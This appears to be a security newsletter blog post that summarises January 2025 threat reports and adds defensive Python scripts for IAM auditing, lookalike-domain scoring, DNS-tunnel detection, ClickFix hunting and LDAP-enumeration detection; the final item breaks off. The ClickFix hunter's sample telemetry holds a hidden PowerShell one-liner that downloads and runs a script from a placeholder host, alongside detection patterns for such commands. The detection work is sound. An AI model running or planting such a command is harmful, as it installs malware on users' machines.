
Exploring Information Security

Securing the Future - A Journey into Cybersecurity Exploration

January 2025 - Cybersecurity Threat Intelligence Newsletter

January 9, 2025

This is a monthly newsletter that I share internally with our Cybersecurity team. Feel free to take and use for your own team. Created with the help of ChatGPT.

ModeLeeK Vulnerabilities in Google's Vertex AI Platform 

Palo Alto Networks' Unit 42 team disclosed two vulnerabilities, collectively termed "ModeLeeK," in Google's Vertex AI platform. Chained together, the flaws let an attacker with limited project permissions escalate privileges and exfiltrate sensitive machine learning (ML) models, including fine-tuned large language model (LLM) adapters. 

Key Insights: 

  • Privilege Escalation via Custom Jobs: Code running inside a custom training job inherits the permissions of the service agent identity the job executes as. That identity held far broader access than a training job needs, so anyone able to submit a custom job could reach data services across the project and expose sensitive information. 

  • Model Exfiltration through Malicious Models: An attacker with permission to deploy a model can upload a poisoned one whose code runs in the serving environment and reads the other fine-tuned models deployed there, exposing proprietary data and custom optimizations. 

Google has addressed these vulnerabilities in the Vertex AI platform. The lesson carries over to any ML platform: treat custom-job and model-deployment permissions as code-execution permissions, grant job identities only what the job actually needs, and deploy untrusted or third-party models in a project isolated from production data and models. 
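The least-privilege check above is easy to automate. The script below is an added example, not code from the newsletter or from Unit 42's research: it reads the JSON shape emitted by `gcloud projects get-iam-policy PROJECT --format=json` (embedded here as a constructed sample) and flags bindings that grant broad roles to identities a Vertex AI job could run as. The role set and the service-account naming patterns are assumptions to adjust to your own environment.

```python
"""Audit a GCP project IAM policy for broad roles on identities Vertex AI jobs
can run as.

Added example, not from the newsletter or Unit 42. Reads the JSON emitted by
`gcloud projects get-iam-policy PROJECT --format=json` (constructed sample
below) and flags bindings that would let a custom job's runtime identity reach
data services project-wide. Role set and naming patterns are assumptions.
"""
import json
import re

# Roles that make any job running under the identity a project-wide pivot.
BROAD_ROLES = {
    "roles/owner", "roles/editor",
    "roles/aiplatform.admin", "roles/storage.admin", "roles/bigquery.admin",
    "roles/iam.serviceAccountTokenCreator", "roles/iam.serviceAccountUser",
}
# Identities a Vertex AI custom job typically executes as (assumption: adjust to
# the service accounts you actually pass to your jobs).
JOB_IDENTITY_PATTERNS = [
    r"-compute@developer\.gserviceaccount\.com$",             # Compute Engine default SA
    r"@gcp-sa-aiplatform(-cc)?\.iam\.gserviceaccount\.com$",  # Vertex AI service agents
    r"vertex|aiplatform|training|pipeline",                   # team naming conventions
]

def is_job_identity(member):
    """True for service-account members whose name matches a job-identity pattern."""
    if not member.startswith("serviceAccount:"):
        return False
    email = member.split(":", 1)[1]
    return any(re.search(p, email) for p in JOB_IDENTITY_PATTERNS)

def audit_policy(policy):
    """Return one finding per (job identity, broad role) pair in the policy."""
    findings = []
    for binding in policy.get("bindings", []):
        role = binding["role"]
        for member in binding.get("members", []):
            if is_job_identity(member) and (role in BROAD_ROLES or role.endswith(".admin")):
                findings.append({"member": member, "role": role,
                                 "has_condition": "condition" in binding})
    return findings

# Constructed policy: the default compute SA holding Editor (the classic
# over-grant), a scoped training SA that also has bigquery.admin, one human owner.
SAMPLE_POLICY = json.loads("""
{
  "bindings": [
    {"role": "roles/owner", "members": ["user:admin@example.com"]},
    {"role": "roles/editor",
     "members": ["serviceAccount:123456789012-compute@developer.gserviceaccount.com"]},
    {"role": "roles/storage.objectViewer",
     "members": ["serviceAccount:vertex-training@ml-proj.iam.gserviceaccount.com"],
     "condition": {"title": "training bucket only",
                   "expression": "resource.name.startsWith('projects/_/buckets/ml-proj-training')"}},
    {"role": "roles/bigquery.admin",
     "members": ["serviceAccount:vertex-training@ml-proj.iam.gserviceaccount.com"]}
  ],
  "etag": "BwYExample==",
  "version": 3
}
""")

if __name__ == "__main__":
    for f in audit_policy(SAMPLE_POLICY):
        print(f"{f['member']} holds {f['role']} project-wide (conditional: {f['has_condition']})")
```

Run it against the real policy export instead of the sample and every line of output is an identity that a malicious custom job or model container would inherit; the conditional storage binding is deliberately left unflagged to show what a scoped grant looks like.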

Further Reading: Unit 42 Blog 


Black Basta Ransomware Adopts Advanced Social Engineering Tactics 

The Black Basta ransomware group has recently enhanced its attack strategies by incorporating sophisticated social engineering techniques, including email bombing, QR code phishing, and the deployment of custom malware payloads. 

Key Developments: 

  • Email Bombing: Attackers subscribe a target's address to large numbers of mailing lists, flooding the inbox. The flood is the pretext: a follow-up "IT support" contact offering to fix the spam problem is far more likely to be trusted. 

  • Impersonation via Microsoft Teams: Threat actors pose as internal IT support, contacting victims through Microsoft Teams to establish trust and talk them into installing remote access tools. Worth checking: whether your tenant allows unsolicited chats and calls from external Teams users at all. 

  • QR Code Phishing: Malicious QR codes are sent to victims, directing them to phishing sites designed to harvest credentials or deploy additional malware. 

  • Custom Malware Deployment: The group utilizes bespoke tools such as KNOTWRAP (a memory-only dropper) and KNOTROCK (a .NET-based utility) to execute ransomware payloads stealthily. 

Further Reading: The Hacker News 


North Korean IT Workers Infiltrating Global Companies 

Recent investigations have uncovered that operatives from the Democratic People's Republic of Korea (DPRK) are securing remote IT positions in international companies under false identities. These individuals channel their earnings to fund North Korea's weapons programs, posing significant security and compliance risks to employers. 

Key Insights: 

  • Use of False Identities: North Korean IT workers often utilize stolen or fabricated identities to obtain employment, making detection challenging. 

  • Revenue Generation for DPRK: Earnings from these positions are funneled back to North Korea, supporting its sanctioned weapons development initiatives. 

  • Potential for Insider Threats: Beyond financial implications, these operatives may have access to sensitive company data, increasing the risk of intellectual property theft and cyber espionage. 

Further Reading: Unit 42 Blog 


North Korean IT Workers Linked to Phishing Attacks via Malicious Video Conferencing Apps 

Unit 42 researchers have identified a cluster of North Korean IT operatives, designated as CL-STA-0237, involved in phishing attacks that deploy malware through counterfeit video conferencing applications. Operating primarily from Laos, these individuals have secured positions in various companies, leveraging their roles to further malicious activities. 

Key Insights: 

  • Malware Distribution: The group utilizes fraudulent video conferencing platforms to disseminate malware, notably the BeaverTail and InvisibleFerret remote access trojans, compromising systems during supposed job interview processes. 

  • Global Reach: By infiltrating organizations worldwide, these operatives support North Korea's illicit endeavors, including its weapons of mass destruction and ballistic missile programs. 

  • Evolving Tactics: The shift from merely seeking income to engaging in aggressive malware campaigns indicates a significant escalation in their operational strategies. 

Further Reading: Unit 42 Blog 


Surge in 'ClickFix' Social Engineering Attacks 

Cybersecurity researchers have identified a significant increase in the use of a social engineering tactic known as "ClickFix." This method deceives users into copying and pasting malicious commands into their systems, leading to malware infections. 

Key Developments: 

  • Deceptive Error Messages: Attackers present fake error dialogs, prompting users to execute provided commands to resolve non-existent issues. 

  • Malware Delivery: By following these instructions, users inadvertently run scripts that download and install malware such as Lumma Stealer and AsyncRAT. 

  • Global Impact: Campaigns employing ClickFix techniques have targeted organizations worldwide, with notable incidents involving fake GitHub security notifications and counterfeit software updates. 

Further Reading: Proofpoint Blog 


Malicious Ads Deliver SocGholish Malware to Kaiser Permanente Employees 

A recent cyberattack has targeted Kaiser Permanente employees through malicious advertisements on Google Search, leading to the distribution of SocGholish malware. 

Key Developments: 

  • Malicious Advertisements: Threat actors placed deceptive ads mimicking Kaiser Permanente's HR portal to lure employees searching for benefits and payroll information. 

  • Compromised Website Redirects: Clicking the fraudulent ad redirected users to a compromised website, bellonasoftware[.]com, which briefly displayed a phishing page before prompting a fake browser update. 

  • SocGholish Malware Deployment: The fake browser update led to the download of "Update.js," a malicious script associated with the SocGholish malware campaign, designed to collect system information and potentially allow human operators to execute further malicious actions. 

This incident highlights the evolving tactics of cybercriminals in exploiting trusted platforms like Google Ads to distribute malware. 

Further Reading: Malwarebytes Blog 


DarkGate Malware Leveraging Vishing via Microsoft Teams 

Recent analyses have identified a concerning trend in which cybercriminals are deploying DarkGate malware through vishing (voice phishing) attacks conducted via Microsoft Teams. 

Key Developments: 

  • Social Engineering Tactics: Attackers impersonate employees from known client organizations during Microsoft Teams calls, convincing victims to download remote desktop applications like AnyDesk. 

  • Malware Deployment: Once remote access is established, DarkGate malware is installed, enabling threat actors to execute malicious commands, gather system information, and maintain persistent access. 

  • Operational Impact: Although some attacks were stopped before data exfiltration, the initial access succeeded, which points to gaps in user awareness and the potential for far more serious incidents. 

Further Reading: Trend Micro Research 


Sophisticated Phishing Campaigns Exploit Trusted Platforms 

Recent analyses have uncovered advanced phishing campaigns targeting employees across multiple industries and jurisdictions. These operations employ sophisticated techniques to bypass Secure Email Gateways (SEGs) and exploit trusted platforms, creating highly convincing schemes to deceive victims and steal their credentials. 

Key Developments: 

  • Exploitation of Trusted Platforms: Attackers leverage familiar platforms and services to enhance the credibility of their phishing attempts, making it more challenging for victims to identify fraudulent communications. 

  • Bypassing Secure Email Gateways (SEGs): The campaigns utilize advanced methods to evade detection by SEGs, allowing malicious emails to reach employees' inboxes undetected. 

  • Wide-Ranging Targets: Over 30 companies across 12 industries and 15 jurisdictions have been affected, indicating a broad and indiscriminate approach by the threat actors. 

Further Reading: Group-IB Blog 


Top Cyber Attacker Techniques (August–October 2024) 

Recent analyses have identified key cyber attacker tactics, techniques, and procedures (TTPs) observed between August 1 and October 31, 2024. 

Key Developments: 

  • Phishing Incidents: Phishing accounted for 46% of all customer incidents during this period, indicating a significant rise likely due to high employee turnover and the accessibility of phishing kits. 

  • Prevalent Malware: "SocGholish" and "LummaC2" emerged as the most frequently observed malware in customer environments, highlighting their widespread use in recent attacks. 

  • Cloud Services Alerts: There was a 20% increase in cloud services alerts, correlating with the rising adoption of cloud accounts and associated security challenges. 

  • Ransomware Activity: Despite a slowdown in "LockBit" ransomware activity due to law enforcement actions and a loss of affiliate trust, it remains a key player. Meanwhile, "RansomHub" is rising rapidly due to its attractive ransomware-as-a-service (RaaS) model. The U.S., manufacturing sector, and professional, scientific, and technical services (PSTS) sector are primary targets amidst an overall increase in ransomware attacks. 

  • Initial Access Broker (IAB) Activity: IAB activity increased by 16%, heavily targeting U.S.-based organizations, possibly due to perceived financial capabilities stemming from cyber insurance. 

  • Insider Threat Content: A 7% rise in insider threat discussions on cybercrime forums was noted, driven by significant financial incentives, underscoring the growing complexity of cybersecurity challenges. 

  • Impersonating Domain Alerts: There was a 6% increase in alerts related to impersonating domains, indicating ongoing reliance on simple techniques to capture credentials and data. 

Further Reading: ReliaQuest Blog 


Phishing Attacks Double in 2024 

Recent analyses reveal a significant surge in phishing activities throughout 2024, with overall phishing messages increasing by 202% in the latter half of the year. Notably, credential phishing attacks have escalated by 703% during the same period. 

Key Developments: 

  • Prevalence of Zero-Day URLs: Approximately 80% of malicious links identified are zero-day threats—newly created URLs designed to evade traditional detection methods. 

  • Diversification of Attack Vectors: While link-based phishing remains predominant, there is a notable increase in text-based threats, such as business email compromise (BEC) and invoice scams, as well as file-based threats employing techniques like HTML smuggling. 

  • Expansion Beyond Email: Phishing attacks are increasingly targeting multiple platforms, including SMS, LinkedIn, and Microsoft Teams, indicating a shift towards multichannel approaches. 

Further Reading: Infosecurity Magazine 


Surge in Phishing Attacks via New Top-Level Domains 

Recent analyses reveal a significant increase in phishing attacks, with a 40% rise observed in the year ending August 2024. A substantial portion of this growth is attributed to the exploitation of new generic top-level domains (gTLDs) such as .shop, .top, and .xyz, which are favored by cybercriminals due to their low registration costs and minimal verification requirements. 

Key Developments: 

  • Disproportionate Use in Cybercrime: Although new gTLDs constitute only 11% of the market for new domains, they account for approximately 37% of reported cybercrime domains between September 2023 and August 2024. 

  • Attraction to Low-Cost Registrations: Registrars offering domain registrations for less than $1, with little to no identity verification, are particularly appealing to spammers and scammers seeking to conduct malicious activities anonymously. 

  • ICANN's Expansion Plans: Despite the misuse of these new gTLDs, the Internet Corporation for Assigned Names and Numbers (ICANN) is proceeding with plans to introduce additional gTLDs, potentially broadening the landscape for cybercriminal activities. 

Further Reading: Krebs on Security 


Surge in Suspicious Domain Registrations Exploiting High-Profile Events 

Recent analyses have identified a significant increase in suspicious domain registration campaigns exploiting high-profile events, such as the 2024 Summer Olympics in Paris. 

Key Developments: 

  • Event-Driven Domain Registrations: Threat actors register deceptive domains containing event-specific keywords to mimic official websites, aiming to deceive users seeking legitimate information. 

  • Exploitation of Public Interest: Cybercriminals leverage global events to attract large audiences, using fraudulent domains to distribute malware, conduct phishing attacks, or sell counterfeit merchandise. 

  • Indicators of Malicious Activity: Monitoring domain registrations, DNS traffic, URL patterns, and textual characteristics can help identify and mitigate these threats. 
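The textual checks listed above (event keywords, lookalike spelling, digit-for-letter substitutions) can be scored together, which also covers the "impersonating domain alerts" item in the ReliaQuest summary earlier in this issue. The script below is an added example, not code from the newsletter or from Unit 42. The brand list, event keywords, TLD set, weights and the sample feed of "new registrations" are all constructed assumptions, not real observations.

```python
"""Score newly registered domains for brand and event impersonation.

Added example, not from the newsletter or Unit 42. Applies event-keyword
matching, edit-distance lookalike detection and digit-for-letter homoglyph
folding, plus a TLD weight. Brands, keywords, TLDs, weights and the sample
feed are constructed assumptions.
"""
import re

BRANDS = ["paris2024", "olympics", "ticketmaster"]                  # assumption: protected terms
EVENT_KEYWORDS = ["olympic", "olympics", "paris2024", "tickets", "jeux"]
RISKY_TLDS = {"shop", "top", "xyz", "icu", "click", "cfd"}          # assumption
HOMOGLYPHS = str.maketrans("01345789", "oleastbg")                   # 0->o, 1->l, 3->e, ...

def normalize(label):
    """Fold digit-for-letter and letter-pair substitutions (par1s -> parls, rn -> m)."""
    return label.lower().replace("rn", "m").replace("vv", "w").translate(HOMOGLYPHS)

NORM_BRANDS = [normalize(b) for b in BRANDS]
NORM_KEYWORDS = [normalize(k) for k in EVENT_KEYWORDS]

def levenshtein(a, b):
    """Classic edit distance (insert/delete/substitute cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def score_domain(domain):
    """Return (score, reasons) for one domain name."""
    labels = domain.lower().rstrip(".").split(".")
    tld = labels[-1]
    tokens = [t for t in re.split(r"[-_.]", ".".join(labels[:-1])) if t]
    compact = normalize("".join(tokens))
    candidates = set(tokens) | {"".join(tokens)}   # compare hyphen parts and the joined name
    score, reasons = 0, []

    hits = [kw for kw in NORM_KEYWORDS if kw in compact]
    if hits:
        score += 2
        reasons.append(f"event keyword(s) {hits}")
    for brand in NORM_BRANDS:
        if brand in compact and compact != brand:      # brand embedded in a longer name
            score += 3
            reasons.append(f"brand term '{brand}' embedded")
            break
    dist, tok, brand = min((levenshtein(normalize(t), b), t, b)
                           for t in candidates for b in NORM_BRANDS)
    if 0 < dist <= 2:                                   # typosquat, but not the brand itself
        score += 3
        reasons.append(f"'{tok}' is {dist} edit(s) from '{brand}'")
        if normalize(tok) != tok:                       # distance was measured after folding
            score += 1
            reasons.append("digit/letter homoglyphs")
    if tld in RISKY_TLDS:
        score += 1
        reasons.append(f".{tld} TLD")
    return score, reasons

def triage(domains, threshold=4):
    """Return (domain, score, reasons) for domains at or above threshold, highest first."""
    flagged = []
    for d in domains:
        score, reasons = score_domain(d)
        if score >= threshold:
            flagged.append((d, score, reasons))
    return sorted(flagged, key=lambda x: -x[1])

# Constructed feed of "new registrations"; none of these are real observations.
SAMPLE_FEED = [
    "paris2024-tickets.shop",
    "par1s-2o24.xyz",
    "olympics-live-stream.top",
    "tlcketmaster-support.cfd",
    "ticketmaster.com",
    "craft-candles.shop",
    "intranet.example",
]

if __name__ == "__main__":
    for domain, score, reasons in triage(SAMPLE_FEED):
        print(f"{score:2d}  {domain:30s} {'; '.join(reasons)}")
```

Normalization is applied to both the brand and the candidate, so a digit swap costs zero edits and is then credited separately as a homoglyph; the genuine `ticketmaster.com` scores zero because an exact match is excluded from the lookalike rule. Feed it a zone-file diff or a certificate-transparency stream instead of the sample list.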

Further Reading: Unit 42 Blog 


Zloader Malware Adopts DNS Tunneling for Stealthier C2 Communications 

Recent analyses have identified that the Zloader malware, a modular Trojan based on the leaked Zeus source code, has incorporated DNS tunneling into its command-and-control (C2) communication methods. 

Key Developments: 

  • DNS Tunneling Implementation: Zloader now employs a custom protocol over DNS, utilizing IPv4 to tunnel encrypted TLS network traffic. This technique enables the malware to conceal its C2 communications within standard DNS queries and responses, making detection more challenging. 

  • Enhanced Anti-Analysis Features: The latest version of Zloader includes improved anti-analysis capabilities, such as environment checks and API import resolution algorithms, to evade malware sandboxes and static detection methods. 

  • Interactive Shell Capability: Zloader has introduced an interactive shell that supports over a dozen commands, potentially facilitating hands-on keyboard activity by threat actors during attacks. 
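Whatever the malware's custom protocol looks like, a DNS tunnel leaves the same footprint in resolver logs: many unique, long, high-entropy subdomains under a single zone. The script below is an added example, not code from the newsletter or from Zscaler's analysis, and it does not decode Zloader's protocol; it profiles constructed query-log lines (timestamp, client, qname, qtype) per zone and flags the ones whose subdomain population looks like encoded payload. The thresholds are assumptions to calibrate against your own traffic.

```python
"""Flag DNS tunnelling candidates from query logs by per-zone label statistics.

Added example, not from the newsletter or Zscaler. Generic observables only
(unique/long/high-entropy subdomains); log lines are constructed and the
thresholds are assumptions to calibrate locally.
"""
import math
from collections import defaultdict

def shannon_entropy(s):
    """Bits per character of the string's symbol distribution."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def split_qname(qname):
    """Return (zone, subdomain). Assumption: the zone is the last two labels;
    use a public-suffix list in production so 'co.uk'-style zones are handled."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return ".".join(labels), ""
    return ".".join(labels[-2:]), ".".join(labels[:-2])

def profile_zones(log_lines):
    """Aggregate per-zone query counts, unique subdomains, lengths and entropies."""
    zones = defaultdict(lambda: {"queries": 0, "subdomains": set(),
                                 "lengths": [], "entropies": [], "qtypes": set()})
    for line in log_lines:
        _ts, _client, qname, qtype = line.split()
        zone, sub = split_qname(qname)
        z = zones[zone]
        z["queries"] += 1
        z["qtypes"].add(qtype)
        if sub:
            z["subdomains"].add(sub)
            z["lengths"].append(len(sub))
            z["entropies"].append(shannon_entropy(sub.replace(".", "")))
    return zones

def find_tunnel_candidates(log_lines, min_unique=5, min_mean_len=30, min_entropy=3.5):
    """Return zones whose subdomains are numerous, long and high-entropy."""
    out = []
    for zone, z in profile_zones(log_lines).items():
        if len(z["subdomains"]) < min_unique:
            continue
        mean_len = sum(z["lengths"]) / len(z["lengths"])
        mean_ent = sum(z["entropies"]) / len(z["entropies"])
        if mean_len >= min_mean_len and mean_ent >= min_entropy:
            out.append({"zone": zone, "unique_subdomains": len(z["subdomains"]),
                        "mean_len": round(mean_len, 1), "mean_entropy": round(mean_ent, 2),
                        "qtypes": sorted(z["qtypes"])})
    return out

# Constructed resolver log: a chatty tunnel under one zone, normal traffic elsewhere.
SAMPLE_LOG = [
    "2025-01-03T09:00:01Z 10.0.23.41 3e7a9c0f1b2d4e6f8a1c3b5d7e9f0a2b.q7k.tunnel-c2.example A",
    "2025-01-03T09:00:02Z 10.0.23.41 9f1e2d3c4b5a69788796a5b4c3d2e1f0.q7k.tunnel-c2.example A",
    "2025-01-03T09:00:03Z 10.0.23.41 0a1b2c3d4e5f60718293a4b5c6d7e8f9.q7k.tunnel-c2.example A",
    "2025-01-03T09:00:04Z 10.0.23.41 c4d5e6f708192a3b4c5d6e7f8091a2b3.q7k.tunnel-c2.example A",
    "2025-01-03T09:00:05Z 10.0.23.41 5d6e7f8091a2b3c4d5e6f708192a3b4c.q7k.tunnel-c2.example A",
    "2025-01-03T09:00:06Z 10.0.23.41 b3c4d5e6f708192a3b4c5d6e7f809100.q7k.tunnel-c2.example A",
    "2025-01-03T09:00:07Z 10.0.7.12 www.intranet.example A",
    "2025-01-03T09:00:08Z 10.0.7.12 mail.intranet.example MX",
    "2025-01-03T09:00:09Z 10.0.7.12 www.intranet.example AAAA",
    "2025-01-03T09:00:10Z 10.0.7.12 cdn.updates.example A",
]

if __name__ == "__main__":
    for c in find_tunnel_candidates(SAMPLE_LOG):
        print(c)
```

Expect false positives from CDNs and anti-virus lookup services that also use hashed subdomains; an allowlist of those zones, plus per-client query volume, is the usual second filter.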

Further Reading: Zscaler Blog 


Cybercriminals Exploit Fake CAPTCHAs to Distribute Malware 

Recent analyses have identified a deceptive tactic where cybercriminals use fake CAPTCHA pages to distribute malware, exploiting users' trust in these verification systems. 

Key Developments: 

  • Malicious Redirects: Users visiting compromised websites are redirected to fraudulent CAPTCHA pages that closely mimic legitimate services like Google and CloudFlare. 

  • Clipboard Hijacking: These fake CAPTCHAs silently copy malicious commands to the user's clipboard via JavaScript, prompting them to execute these commands unknowingly through the Windows Run prompt. 

  • Malware Installation: Executing the copied commands leads to the installation of malware, including information stealers and remote-access trojans (RATs), which can extract sensitive data and provide persistent access to compromised systems. 
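Because the victim types the payload into the Run dialog themselves, the reliable telemetry for both this fake-CAPTCHA variant and the ClickFix campaigns summarised earlier in this issue is process creation: an interpreter spawned by explorer.exe with a one-liner that downloads and executes. The script below is an added example, not code from the newsletter or from any of the cited vendor reports. The log format (pipe-separated timestamp, host, parent image, image, command line) is constructed, and the keyword list is an assumption about what these lures paste; map both onto your own EDR or Sysmon Event ID 1 schema.

```python
"""Hunt for ClickFix / fake-CAPTCHA execution in process-creation telemetry.

Added example, not from the newsletter or any cited vendor. Log lines are
constructed (timestamp|host|parent_image|image|command_line); the parent/child
sets and command-line fragments are assumptions to tune against your baseline.
"""
import re
from dataclasses import dataclass

# Win+R hands the command to explorer.exe, which becomes the parent of the interpreter.
RUN_DIALOG_PARENTS = {"explorer.exe"}
LOLBIN_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                   "wscript.exe", "cscript.exe", "curl.exe", "msiexec.exe",
                   "certutil.exe", "bitsadmin.exe"}

# Command-line fragments common to copy-paste lures (assumption: extend as needed).
SUSPICIOUS_TOKENS = [
    (r"\biex\b|invoke-expression", "inline expression execution"),
    (r"\birm\b|\biwr\b|invoke-restmethod|invoke-webrequest|downloadstring", "remote download"),
    (r"-w(indowstyle)?\s+h(idden)?", "hidden window"),
    (r"-nop\b|-noprofile", "profile bypass"),
    (r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"frombase64string", "base64 payload"),
    (r"mshta(\.exe)?\s+https?://", "mshta remote HTA"),
    (r"\bcurl(\.exe)?\b.*\|\s*(cmd|powershell|bash)", "curl piped to interpreter"),
    (r"clipboard", "clipboard use"),
]

@dataclass
class Finding:
    host: str
    image: str
    score: int
    reasons: list

def analyze_event(parent_image, image, command_line):
    """Return (score, reasons) for one process-creation event."""
    parent = parent_image.rsplit("\\", 1)[-1].lower()
    child = image.rsplit("\\", 1)[-1].lower()
    cmd = command_line.lower()
    score, reasons = 0, []
    if parent in RUN_DIALOG_PARENTS and child in LOLBIN_CHILDREN:
        score += 2
        reasons.append(f"{child} launched from {parent} (Run dialog / shell)")
    for pattern, label in SUSPICIOUS_TOKENS:
        if re.search(pattern, cmd):
            score += 1
            reasons.append(label)
    return score, reasons

def hunt(log_lines, threshold=3):
    """Return a Finding for every event scoring at or above threshold."""
    findings = []
    for line in log_lines:
        _ts, host, parent, image, cmdline = line.split("|", 4)   # cmdline may itself contain '|'
        score, reasons = analyze_event(parent, image, cmdline)
        if score >= threshold:
            findings.append(Finding(host, image.rsplit("\\", 1)[-1], score, reasons))
    return findings

# Constructed sample telemetry: one lure-style event, three benign ones.
SAMPLE_LOG = [
    "2025-01-03T14:02:11Z|WS-0421|C:\\Windows\\explorer.exe|"
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell -w hidden -nop -c \"iex (irm http://captcha-verify.example/x.ps1)\"",
    "2025-01-03T14:05:40Z|WS-0421|C:\\Windows\\explorer.exe|"
    "C:\\Program Files\\Mozilla Firefox\\firefox.exe|firefox.exe",
    "2025-01-03T14:06:02Z|WS-0388|C:\\Windows\\System32\\services.exe|"
    "C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs",
    "2025-01-03T14:09:17Z|WS-0102|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\cmd.exe|cmd /c dir",
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"{f.host}: {f.image} score={f.score} -> {', '.join(f.reasons)}")
```

A plain `cmd /c dir` from the Run dialog scores 2 and stays below the threshold, so everyday use of Win+R does not page anyone; the lure line scores on parent/child plus four command-line traits. The same lure also leaves the pasted text in the user's `HKCU\...\Explorer\RunMRU` key, which is worth pulling during triage.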

Further Reading: ReliaQuest Blog 


Threat Actors Exploit LDAP for Network Enumeration 

Recent analyses have identified that both nation-state and cybercriminal threat actors are leveraging the Lightweight Directory Access Protocol (LDAP) to perform network enumeration within Active Directory environments. 

Key Developments: 

  • Abuse of LDAP Attributes: Attackers utilize LDAP queries to extract sensitive information, such as user accounts, group memberships, and permissions, facilitating lateral movement and privilege escalation within compromised networks. 

  • Use of Enumeration Tools: Tools like BloodHound and its data collector, SharpHound, are commonly employed to map Active Directory structures, identifying potential attack paths and high-value targets. 

  • Detection Challenges: Distinguishing between legitimate and malicious LDAP activity is difficult due to the high volume of benign LDAP traffic in typical network environments, complicating efforts to detect and mitigate these attacks. 
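One way past the volume problem is to stop looking at individual queries and instead fingerprint the pattern a collector produces: a single client, in a short window, asking for every user, every computer, every group, every GPO and every trust. The script below is an added example, not code from the newsletter or from Unit 42. Its input records (client, account, filter, result count) are constructed; the filter list reflects the broad object-class and samAccountType queries that collectors such as SharpHound issue, but the exact strings, thresholds and the allowlisted scanner address are assumptions to tune against your own baseline.

```python
"""Fingerprint bulk Active Directory enumeration in LDAP search telemetry.

Added example, not from the newsletter or Unit 42. Records are constructed;
the filter categories, thresholds and scanner allowlist are assumptions.
"""
import re
from collections import defaultdict

# Broad filters that pull whole object classes. The samAccountType constants are
# Microsoft's: 805306368 user, 805306369 computer, 268435456/268435457 global
# groups, 536870912/536870913 domain-local groups.
ENUM_FILTERS = {
    "all users": r"samaccounttype=805306368",
    "all computers": r"samaccounttype=805306369",
    "all groups": r"samaccounttype=(268435456|268435457|536870912|536870913)|objectclass=group\b",
    "all OUs": r"objectclass=organizationalunit",
    "all GPOs": r"objectclass=grouppolicycontainer",
    "trusts": r"objectclass=trusteddomain",
    "domain object": r"objectcategory=domain",
    "wildcard": r"\(objectclass=\*\)",
}
KNOWN_SCANNER_IPS = {"10.0.9.5"}   # assumption: your approved audit / IGA collector

def normalize(filt):
    """Lower-case and strip whitespace so filter variants compare equal."""
    return re.sub(r"\s+", "", filt).lower()

def classify_filter(filt):
    """Return the enumeration category a filter falls into, or None for targeted lookups."""
    f = normalize(filt)
    for label, pattern in ENUM_FILTERS.items():
        if re.search(pattern, f):
            return label
    return None

def detect_enumeration(records, min_categories=3, min_results=500):
    """Group LDAP searches by client and flag clients sweeping several object classes."""
    per_client = defaultdict(lambda: {"categories": set(), "results": 0, "accounts": set()})
    for rec in records:
        label = classify_filter(rec["filter"])
        stats = per_client[rec["client"]]
        stats["accounts"].add(rec["account"])
        if label:
            stats["categories"].add(label)
            stats["results"] += rec["result_count"]
    alerts = []
    for client, stats in per_client.items():
        if client in KNOWN_SCANNER_IPS:
            continue
        if len(stats["categories"]) >= min_categories and stats["results"] >= min_results:
            alerts.append({"client": client,
                           "accounts": sorted(stats["accounts"]),
                           "categories": sorted(stats["categories"]),
                           "results": stats["results"]})
    return alerts

# Constructed sample: a workstation sweeping the directory, a print server doing
# targeted lookups, and the allowlisted audit collector doing its job.
SAMPLE_RECORDS = [
    {"client": "10.0.23.41", "account": "CORP\\jdoe", "filter": "(samAccountType=805306368)", "result_count": 4210},
    {"client": "10.0.23.41", "account": "CORP\\jdoe", "filter": "(samAccountType=805306369)", "result_count": 1880},
    {"client": "10.0.23.41", "account": "CORP\\jdoe",
     "filter": "(|(samaccounttype=268435456)(samaccounttype=268435457)(samaccounttype=536870912)(samaccounttype=536870913))",
     "result_count": 960},
    {"client": "10.0.23.41", "account": "CORP\\jdoe", "filter": "(objectClass=trustedDomain)", "result_count": 2},
    {"client": "10.0.23.41", "account": "CORP\\jdoe", "filter": "(objectclass=groupPolicyContainer)", "result_count": 133},
    {"client": "10.0.7.12", "account": "CORP\\svc-print", "filter": "(&(objectClass=user)(sAMAccountName=psmith))", "result_count": 1},
    {"client": "10.0.7.12", "account": "CORP\\svc-print", "filter": "(&(objectClass=computer)(cn=PRN-04))", "result_count": 1},
    {"client": "10.0.9.5", "account": "CORP\\svc-audit", "filter": "(samAccountType=805306368)", "result_count": 4210},
    {"client": "10.0.9.5", "account": "CORP\\svc-audit", "filter": "(samAccountType=805306369)", "result_count": 1880},
    {"client": "10.0.9.5", "account": "CORP\\svc-audit", "filter": "(objectClass=group)", "result_count": 960},
]

if __name__ == "__main__":
    for a in detect_enumeration(SAMPLE_RECORDS):
        print(f"{a['client']} as {a['accounts']}: {a['results']} objects via {a['categories']}")
```

The filter strings come from domain-controller search logging (the LDAP expensive/inefficient-search events, or a network sensor on 389/636); the point of the category count is that a workstation legitimately looks up one user or one printer, but rarely needs every trust, every GPO and every group in one sitting.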

Further Reading: Unit 42 Blog 


'Araneida' Web Hacking Service Linked to Turkish IT Firm 

Recent investigations have uncovered that 'Araneida,' a cloud-based web hacking service, is utilizing a cracked version of Acunetix—a commercial web application vulnerability scanner—to facilitate cyberattacks. Notably, this service has been traced back to a Turkish information technology firm. 

Key Developments: 

  • Exploitation of Cracked Software: Araneida employs an unauthorized version of Acunetix, enabling users to perform offensive reconnaissance, extract user data, and identify exploitable vulnerabilities on target websites. 

  • Proxy Integration for Anonymity: The service incorporates a robust proxy network, allowing scans to originate from a diverse pool of IP addresses, thereby concealing the true source of the activity. 

